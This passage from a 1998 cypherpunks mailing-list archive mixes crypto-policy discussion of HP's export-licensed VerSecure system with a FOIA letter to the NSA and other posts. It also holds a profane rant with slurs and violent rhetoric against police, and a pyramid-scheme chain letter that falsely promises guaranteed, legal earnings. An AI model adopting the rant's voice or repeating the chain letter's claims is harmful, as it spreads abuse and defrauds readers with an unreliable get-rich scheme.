grow so long that they curl up like a ram's horns.)
  Would the armed thugs pretending to 'serve and
protect' have been using rubber bullets if there was
no press present? (Can you say 'Ruby Ridge'? Sure
you can...)
  What if the grandmother busted for helping a stranger
avoid paying vigorish to the armed thugs by plugging
parking meters had told the thugs, "Fuck you! You 
assholes are crazy and out of control. I refuse to
be subject to the insanity of your armed rule over
every detail of the citizen's life."?
  She would be one dead cunt...


What's Good For The Gander Is Good For Those Getting Goosed:
  Am I overreacting?
  I am being muscled by thugs that will murder me over
thirty dollars, just to maintain their control over the
Sheeple that they rule.
  Any way you want to cut it, you cannot deny that you know
this is true.

  Do you understand?
  Do you understand that these people are willing to murder
a compound full of people holding 'eccentric' religious
beliefs--men, women and children--justifying their actions
on the grounds of what they later admit are lies?
  Do you understand that instead of admitting to their
criminal actions, they will make criminals of the survivors,
placing them in prisons designed to reinforce upon the
citizenry that even their children will be slaughtered if
they are so bold as to say, "The King has no clothes."


I Know You Can Read...But Can You Understand?:
    Can you pick up a paper without reading about some
atrocity being perpetrated on individuals and groups of
citizens by the armed thugs in power?
[Tuscon Nutly News--MILITARY ANALYSTS REPORT THAT IN
the last three years, 42,384,672 senior and general
Army officers were accused of offenses including child
molestation and adultery--and not one was prosecuted.
Each was allowed simply to retire.
  Sgt. Maj. Gene C. McKinney, however, not being an
officer, faces 55 years in prison for lechery, as 
a result of being accused of an act of foreplay
that occured during consensual sex with a woman
not his wife.
  Sgt. Maj. McKinney, when reached for comment by
the Left Nutly News, said, "I should have 'accidentally'
killed her after sex. Under the Uniform Code of Military
Justice, negligent homicide only carries a maximum
sentence of *three* years."
  Joseph Finder, author of the novel "High Crimes," told
Nutly News reportwhores, in response to allegations that
the Nutly News was misquoting his article and inflating
the numbers involved for shock effect, said, "I write 
for the mainstream media. I'm supposed to pretend that
murdering a hundred innocent children makes someone
more of a monster than murdering a single innocent child,
especially if the murderer voted to give my publisher
a huge tax-break for requiring his staff to make certain
that the child was born naked, and thus was obviously
involved in some sort of child-pornography ring."
When asked for comment, a Pentagon spin-liar told 
Nutly News reportwhores, "It's called the Uniform Code
of Military Justice because we look at what kind of
uniform they are wearing, and then decide what kind of
justice they are going to get."]

  Can you pick up a newspaper without reading about some
totally clueless dickwad--who is licensed to carry a gun,
shoot any citizen on the slightest whim, and then lie
about it in court under cover of a neatly-pressed uniform
and shiny badge--performing some outrageous act that an
ordinary citizen would be lynched for?
[Tucson Nutly News--WHEN THE POLICE OFFICER WHO PLAYS THE
role of McGruff, the police dog (Take a bite out of crime)
was unavailable, a fellow police monger called upon the
services of an inmate incarcerated for child molestation
to fill in as McGruff, in a school classroom containing
one of the child rapist's victims.
Although the voice of Charles Darwin could be heard
calling out from the grave, "Put a bullet in this ignorant
Pig's head, before he breeds.", the citizenry merely turned
to the weather section of the paper, to see if the weekend
would be nice enough for them to take their children to
the park, where the same ignorant piece-of-shit police
officer would be in charge of 'serving' the children up
to convicted child-molesters, and 'protecting' himself
from suffering the consequences of his incompetence by
making sure that his union dues were paid up.
  When asked for comment, McGruff, the police dog, told
this reportwhore, "The regular guy's not back yet...do
you have any children...do you have any pictures of 
them naked?"
  In the 'Real Sports' section of the same newspaper,
the ClueServer Sports Wire reported the results of the
True Justice Championship Game as: Child Molesters - 1,
Children - 0.]


Lucky Strike, Lucky Green -- by Defcon McCullagh Chainsaw
[Time We Found The Path--FOR THE FIRST TIME IN DIGITALLY
recorded history, the voice of the netizens has triumphed
over the paid political spin-doctoring of the mainstream
media.
In a startling development with global consequences, the
recent actions taking place in a Cult of One community
in Southern Saskatchewan, the TownShip of MongerItaville,
have been embraced by citizens around the globe in light
of the information reported by independent observers
relaying a wide variety of details via the InterNet and
the World-Wide-Web, rather from the standard government
hand-outs provided to the mainstream media reportwhores
gathered around the free drinks and snacks left over from
Desert Storm.
  TruthMonger, the Grand Pooh-Bah(Humbug) of the
physico-virtual nation of MongerItaville, launched
a surprise First Strike against the dangerous armed
thugs who had threatened his physico-virtual existence
over the paltry sum of thirty dollars.
  TruthMonger told this reportwhore, "John Lennon called
me the 'Fifth Horseman of the Apocalypse' because I used
to say, 'Throw them all in the laundry bag, and let the
maid sort them out.' I know that this statement doesn't
make any sense, but, believe it or not, this is one of
my *good* days."
  Cult of One analysts from around the globe agree
that the straw-dog that broke Joe Camel's back was
provided by a post to the CypherPunks mailing list
by Lucky Green and his secret lover, Anna R. Christ.
  "We finally understand what 'The Xenix Chainsaw
Massacre' was all about.
  "It was about an individual whose brain had been
destroyed from too many electroshock treatments and
years of drug abuse, finally taking a stand and 
deciding to do what was right, even though he had
no idea what that meant.
  "It was about people who heard the voice barfing
in the wilderness, which told them that it was
OK to tell the fruitcakes wearing crystals around
their necks to go fuck themselves, and kick their
ass if they didn't give them back the five hundred
bucks they paid to take a seminar which was nothing
more than 'The Power of Positive Thinking' with
a Barnum & Bailey/New Age spin-doctoring tacked
on to rook Spiritually Correct Rubes.
  "It was about learning to follow your own wisdom,
your own conscience, and give the guru whose ass
you just kicked a few dollars to cover the cost
of the hot-dog provided by the Sufi vendor at
the back of the seminar hall, who delivered on
his promise to '...make you one with everything.'
  "It was about ninety pages long..."
  Jean Chretien, the former Prime Minister of
Canada, the country brought down by the Cult of
One seperatist movement inspired by the seige
at MongerItaville, said, "You can fool some of
the people all of the time, and all of the people
some of they time, but...hey, we kept the citizens
believing, for a hundred years, that Louis Riel
acted alone..."
When contacted by this reportwhore, God, the Supreme
Creator of the Universe, said that, due to the Cult Of
One phenomena currently sweeping over the face
of the earth, due to everyone now having their
own web site, "Now I, like Dog, speak only for
myself..."
  This is Defcon McCullagh Chainsaw, going with the
flow and mediating on the Zen koan, "Is this a new
spin on the revolution, or vice-versa?"]


Am I Being Silly Again?:
  Sure...so what's your point?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 28 Feb 1998 15:00:34 -0800 (PST)
To: Tim May <tcmay@got.net>
Subject: Re: HP Crypto Export
In-Reply-To: <3.0.2.32.19980228141822.006aee98@descartes.coker.edu>
Message-ID: <v0300780fb11e4688182c@[204.254.22.36]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 -0800 2/28/98, Tim May wrote:
>A constant danger with any of these "solutions" is that they make later
>imposition of controls so much easier. Consider the implications of
>widespread deployment of the HP-type system (which, BTW, I don't think will
>happen in the U.S., or elsewhere).
>
>A simple change in the law and all new tokens (and they must be renewed
>yearly, so says HP) will implement the new law.

It's a sign of the times when Tim and I can agree on these things, or at
least recognize the same problems. Note NONE of HP's press materials
included that 1 year detail. --Declan

====

http://cgi.pathfinder.com/netly/afternoon/0,1012,1771,00.html

One-Year Itch

Even if you studiously ignore the arcana of encryption export rules, it's
worth paying attention to a new product from Hewlett Packard.
The government has OK'ed the overseas sale of HP's "VerSecure" boards and
computer chips that have full-strength encryption built in -- but turned
off by default. To engage the data-scrambling features, you'll need an
"activation token."

Catch is, however, that they last only one year, and the tokens also can
open a "key recovery" electronic peephole for snooping government agents.
This is the only way HP can hawk these things in France, a country with no
shortage of such police.

Now, the FBI wants to ban U.S. software without such peepholes. Doesn't
crypto-crippleware make it much easier for the government to issue only
key recovery tokens when everyone's existing ones expire?
"Whatever the law is in the U.S., we will comply," says CEO Lewis Platt.
--By Declan McCullagh/Washington






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 28 Feb 1998 18:59:06 -0800 (PST)
To: tcmay@got.net
Subject: Chemical, Biological, or Radiation (CBR) weapons
Message-ID: <34F8CC2A.20BA@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Saturday 2/28/98 7:22 PM

Tim May

Just saw your stuff at jya.com.

Got in the mail today  

  Volume 9, Number 4, 1997

  MILITARY PSYCHOLOGY

  The Official Journal of the 
  Division of Military Psychology
  American Psychological Association

  Special Issue:  Effects of Chemical Protective
                  Clothing of Military Performance
  Guest Editors:  Gerald P. Krueger and
                  Louis E. Banderet

I'll transcribe some of the text.

The US government drugs soldiers before they go into battle.

Trust me.

Banderet was ANOTHER of my Ph. D. students.

Later
bill

Title: HP Crypto Export






28 February 1998

  
Date: Sat, 28 Feb 1998 14:18:22 -0500
To: cypherpunks@toad.com
From: Michael Elder <melder@descartes.coker.edu>
Subject: HP Crypto Export


>From the NY Times online (www.nytmes.com)

February 28, 1998


Hewlett-Packard Granted License For Encryption System 

By Peter Wayner 

The Commerce Department has granted Hewlett-Packard an export license for
its VerSecure encryption architecture allowing the company and its
licensees to export strong encryption tools, the company announced Friday.
The catch is that the products must take their orders from a central
computer system that will dictate how all the products will behave in each
country. 

The company hopes that the solution would break the deadlock between the
Clinton Administration, which continues to restrict the export of secure
computer technology throughout the world, and the computer industry, which
contends that foreigners are not interested in buying products that don't
protect their secrets. 

The new solution effectively disconnects the problem of distributing
encryption technology from the process of determining the policy for
government access to information. The heart is a new class of trusted
hardware cards and chips that take their orders from a central company
known as a Security Domain Authority or SDA. In countries, like France,
that require people to keep a record of keys for unlocking data, the SDA
would only allow the computers to encrypt information if it complied with
the laws. In countries with no laws about encryption usage like the United
States, Germany and Great Britain, the SDA would allow users to encrypt in
whatever manner they choose. 

Hewlett-Packard sees the solution as a win for the industry, which will be
able to build one set of hardware and software that can be shipped
throughout the world. The SDA's will set the local rules because the
computers will not encrypt information without first getting permission
from the SDA.

Doug McGowan, one of the director of Hewlett-Packard's efforts, said in a
telephone interview, "Never before has a general purpose cryptography tool
been exportable from the United States, with or without key recovery. We're
opening a huge market for American industry to enable commerce on a
worldwide basis." 

The price for this flexibility is the need for specialized hardware that
treats the SDA as its master. In an ordinary computer, the owner can
control all aspects of what the computer does. This extra hardware will
raise the price of machines and is bound to be more expensive than software
which can be distributed at minimal cost. 

Feisal Mosleh, a business development manager at Hewlett-Packard, pointed
out that specialized hardware can offer faster performance and more
security. "It is very hardware-specific with the flexibility of software
and that gives us a lot of strength in terms of tamper resistance" he said
in a phone interview.

Many security experts continue to point out that general-use microcomputers
and their operating systems are dangerously insecure. In one recent attack,
hackers were able to begin transfers from a bank account by manipulating
accounting software. Off-loading the process to specialized hardware makes
it simpler to ensure that the system is secure because the special hardware
has only one job.

Hewlett-Packard says that it is licensing the architecture to a number of
different computer vendors and announced that IBM, Motorola, CertCo,
Trusted Information System, Microsoft and RSA Data Securities had already
signed licenses. The vendors will be free to choose how they implement the
special computer hardware, but most will probably use firmware with an
embedded microprocessor. The initial version will reportedly include DES,
triple-DES, RSA, RC2, RC4 and Diffie-Hellman algorithms. Each of these
solutions can be sped up by specialized hardware, but only a general
microprocessor can handle all of them with equal agility. 

The specialized hardware will also be tamper-proof to prevent people from
circumventing the commands of the SDA. When an encryption card is first
started up, it cannot begin working until it has received instructions from
an SDA in its country. This information is contained in a "policy token."
Joe Beyers, general manager of Hewlett-Packard's Internet Software business
unit, explained, "The token says, 'You can use this amount of key, this
amount of strength for this amount of time.'"

Beyers went on to say, "The aspect of time allows the government to evolve
their policy. Time limits are one of the attributes that made it attractive
to the U.S. government." It would be possible for a government to change
policy with the system from time to time, perhaps forcing citizens to use
long keys in time of war to protect themselves and then relaxing the policy
after peace emerged. 

In the current plan, policy tokens would be good for one year, forcing
computers to re-register with an SDA in order to keep working. The SDA
would have no control of a token after it was issued and would only be able
to change policies at the renewal. 

The relationship between the SDA and the key recovery program is more
difficult to describe. The SDA would not keep any records of any keys that
would allow the police to eavesdrop on calls. But the policy tokens would
force the embedded hardware to obey the local laws that might include key
recovery. The FBI has asked Congress to mandate key recovery systems that
give it clear access to all communications. 

The yearly interrogation between the SDA and the individual computers does
not mean that the system will be foolproof. Someone could simply carry a
laptop from a country that allows personal privacy to a country with more
invasive laws and use it freely until the policy token runs out. Also, it
may be possible to spoof the token authorization procedure by pretending
that the request came from one country instead of another. 

Some critics found the use of special hardware to be problematic. Jim
Lucier, a policy analyst for the Americans for Tax Reform, a Republican
think tank, pointed out that specialized hardware was ignored by the
marketplace in the past. "None of it ever works" he said, "because the more
obvious solution, which is end-to-end encryption, is already there."

Lucier also pointed out that specialized hardware is more complicated to
engineer and much more expensive to distribute than software. "Atoms cost
more than bits, it just comes down to that," he said. In a press conference
Friday morning, Beyers promised that the new hardware was "months, not
years away" and also promised that the hardware costs would be as low as
possible. 

Marc Rotenberg, director of the Electronic Privacy Information Center,
suggested that replacing the current export control bureaucracy with a
network of SDA's was not a significant advance. "Government efforts to
regulate crypto will only slow the development of commerce," he said.

In fact, the decision by the United States government to grant a license to
Hewlett-Packard's architecture is far from liberating. Companies making
VerSecure products can only ship them to countries approved by the United
States government, a list which at this time is limited to the United
Kingdom, Germany, France, Denmark and Australia. More countries will become
open if and when they create an SDA infrastructure that is acceptable to
the United States. 

Hewlett-Packard has gone to great lengths to prevent rogue nations from
setting up their own unauthorized SDA's by cloning hardware. The
infrastructure uses CertCo's secure certificate servers to restrict the
ability to create the software necessary to build the tokens. Beyers says
that no one person at Hewlett-Packard has the ability to do this in order
to reduce the potential for corruption and theft.

Hewlett-Packard is also working heavily with foreign countries to assure
them that the system does not include back doors that might be accessible
by the United States government. Beyers said that the company had retained
an international group of cryptographic experts to vet the system and allay
any fears of hidden back doors. 

A press release from Hewlett-Packard quoted William A. Reinsch,
undersecretary of commerce, as saying, "We are pleased to support HP's
effort to develop and market encryption products that encourage the use of
key recovery in providing robust, secure encryption. This approval and our
ongoing dialogue with the industry are consistent with the Clinton
Administration's goal of allowing the market to develop recoverable
encryption products."

Peter Wayner at pwayner@nytimes.com welcomes your comments and suggestions.

Copyright 1998 The New York Times Company 



Date: Sat, 28 Feb 1998 12:08:30 -0800
To: Michael Elder <melder@descartes.coker.edu>, cypherpunks@toad.com
From: Tim May <tcmay@got.net>
Subject: Re: HP Crypto Export

At 11:18 AM -0800 2/28/98, Michael Elder wrote:
>>From the NY Times online (www.nytmes.com)
>Hewlett-Packard Granted License
>For Encryption System
>
>By PETER WAYNER

>known as a Security Domain Authority or SDA. In countries, like France,
>that require people to keep a record of keys for unlocking data, the SDA
>would only allow the computers to encrypt information if it complied with
>the laws. In countries with no laws about encryption usage like the United
>States, Germany and Great Britain, the SDA would allow users to encrypt in
>whatever manner they choose.

Until, of course, the U.S. changes its policy.

A constant danger with any of these "solutions" is that they make later
imposition of controls so much easier. Consider the implications of
widespread deployment of the HP-type system (which, BTW, I don't think will
happen in the U.S., or elsewhere).

A simple change in the law and all new tokens (and they must be renewed
yearly, so says HP) will implement the new law.

The camel's nose in the tent strategy.

The HP/IBM product is perniciously evil and should be fought with all
technical and memetic means.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.





Title: Untitled Document









Viewing this page requires a browser capable of displaying frames.





Friday February 27, 1998 3:15 PM


By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor 
Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those   
        whichthe tests failed to detect failures.  Wisniewski will talk.  
        503-625-6408.  Wisniewski now works for Intel in Oregon.  Have 
        Wisniewski tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at 
http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at 
     programming. 
     Chip ID, family key and device unique key are installed at programming           
     facility and are completely transparent to the user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between 
January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in 
development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize the 
crypto business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the 
public."
  
I believe that this requests fits that category and I therefore ask that 
you waive any fees.

If all or any part of this request is denied, please cite the specific 
exemption(s) which you think justifies your refusal to release the information and inform me of your agency's administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as possible, and I 
look forward to hearing from you within 20 working days, as the law stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them.
[http://www.aci.net/kalliste/speccoll.htm]. http://www.wpiran.org/,
http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, [http://persia.org/khatami/biography.html], appear 
want settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: real@inet.com
Date: Sat, 28 Feb 1998 18:56:50 -0800 (PST)
Subject: ///// Have You Ever!! ////////////
Message-ID: <199803010256.SAA01837@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Amazing Program! Make $50,000.00 in 2 months with your computer and the net !

     IT REALLY WORKS FOLKS!!
////////////////////////////////////////////////////////////////////////////////////
   IMAGINE $50,000 , ALL YOURS IN 2 MONTHS

HERES HOW TO MAKE $50,000 EASY. DO NOT DELETE!  I AM SERIOUS
THAT THIS WORKS. THIS IS THE SECOND TIME I HAVE DONE THIS, AND I GOT $66,000
MY FIRST TIME. I AM A 17 YEAR OLD WITH A BMW!!!! IT ONLY TAKES ABOUT A
MONTH AND A HALF TOO!! JUST FOLLOW THE DIRECTIONS BELOW AND YOU'LL GET
MONEY FAST, EASY, AND HAVE FUN DOING IT.

The following is a copy of the e-mail I read:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEY-MAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you
may ever see. Many times over, it has demonstrated and proven its ability
to generate large amounts of cash. This program is showing fantastic appeal
with a huge and ever-growing on-line population desirous of additional
income.

This is a legitimate, LEGAL, money-making opportunity.  It does not
require you to come in contact with people, do any hard work, and best of all,
you never have to leave the house, except to get the mail and go to the
bank!

This truly is that lucky break you've been waiting for!  Simply follow
the easy instructions in this letter, and your financial dreams will come
true! When followed correctly, this electronic, multi-level marketing program
works perfectly...100% EVERY TIME!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!

This is your chance, so don't pass it up!

------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC
MULTI-LEVEL MARKETING PROGRAM
------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to nothing
to produce and e-mail. As with all multi-level businesses, we build
our
business by recruiting new partners and selling our products.  Every
state
in the U.S. allows you to recruit new multi- level business online (via
your
computer).

The products in this program are a series of four business and financial
reports costing $5.00 each.  Each order you receive via "snail mail"
will
include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S
IT!
The $5.00 is yours!  This is the EASIEST electronic multi-level marketing
business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO REAP THE
STAGGERING BENEFITS!

     ******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them
if you
don't order them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE REPORT
YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR RETURN POSTAL
ADDRESS
(in case of a problem) to the person whose name appears on the list
next
to the report.

     *  When you place your order, make sure you order each of the four
reports.  You will need all four reports so that you can save them on
your
computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the
four
reports. Save them on your computer so they will be accessible for you
to
send to the 1,000's of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed
next to
each report, or their sequence on the list, in any way other than is
instructed below in steps "a" through "d" or you will lose out on the
majority of your profits.  Once you  understand the way this works,
you'll
also see how it doesn't work if you change it.  Remember, this method
has
been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and
address
        under REPORT #1 with your name and address, moving the one that
        was there down to REPORT #2.

    c.  Move the name and address that was under REPORT #2 down to REPORT
        #3.

    d.  Move the name and address that was under REPORT #3 down to REPORT
        #4.

    e.  The name and address that was under REPORT #4 is removed from
the
        list and has NO DOUBT collected their 50 grand.

Please make sure you copy everyone's name and address ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and
save
it to your computer.  Make NO changes to the instruction portion of
this
letter.

4.  Now you're ready to start an advertising campaign on the WORLDWIDE
WEB!
Advertising on the WEB is very, very inexpensive, and there are HUNDREDS
of
FREE places to advertise. Another avenue which you could use for advertising
is e-mail lists.  You can buy these lists for under $20/2,000 addresses
or
you can pay someone a minimal charge to take care of it for you.

BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the
report
they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!
This will guarantee that the e-mail THEY send out, with YOUR name and
address on it, will be prompt because they can't advertise until they
receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------

***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL
-  Make sure the cash is concealed by wrapping it in at least two sheets
of
paper
-  On one of those sheets of paper, include: (a) the number & name of
the
report you are ordering, (b) your e-mail address, and (c) your postal
address.
________________________________________

REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"

ORDER REPORT #1 FROM:
                        Tgar Enterprise
                         P.O. Box 1984
                    Stafford, VA 22555-1984
_______________________________________

REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:
                    RWC Ent.
                    Unit 50 Hamlyn Road Plaza
                    Suite #110
                    St. John's, Newfoundland
                    Canada, A1E 5X7
________________________________________

REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
                      MMS Publications
                      P.O. Box 116101
                      Carrollton, TX 75011    
________________________________________

REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
                          M.M.L.I.
                          1011 Cimarron Cir. N.W.
                          Bradenton, FL 34209
________________________________________

------------------------------------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
------------------------------------------------------------

Let's say you decide to start small just to see how well it works. Assume
your goal is to get 10 people to participate on your first level. (Placing
a
lot of FREE ads on the internet will EASILY get a larger response.)
Also
assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline
members.  Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $5...........................$50
2nd level--10 members from those 10 ($5 x 100...............$500
3rd level--10 members from those 100 ($5 x 1,000).........$5,000
4th level--10 members from those 1,000 ($5 x 10,000).....$50,000
                                THIS TOTALS  ----------->$55,550

Remember friends, this assumes that the people who participate only
recruit
10 people each.  Think for a moment what would happen if they got 20
people
to participate!  Most people get 100's of participants! THINK ABOUT
IT!

Your cost to participate in this is practically nothing (surely you
can
afford $20). You obviously already have an internet connection and e-mail
is FREE!!! REPORT#3 shows you the most productive methods for bulk e-mailing
and purchasing e-mail lists.  Some list & bulk e-mail vendors even work
on
trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow
the
directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them when
the
orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
product/report to comply with the U.S. Postal & Lottery Laws, Title
18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
also
Code of Federal Regs. vol. 16, Sections 255 and 436, which state that
"a
product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the
instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue advertising until you do.  Then, a couple of weeks later you
should
receive at least 100 orders for REPORT #2.  If you don't, continue
advertising until you do.  Once you have received 100 or more orders
for
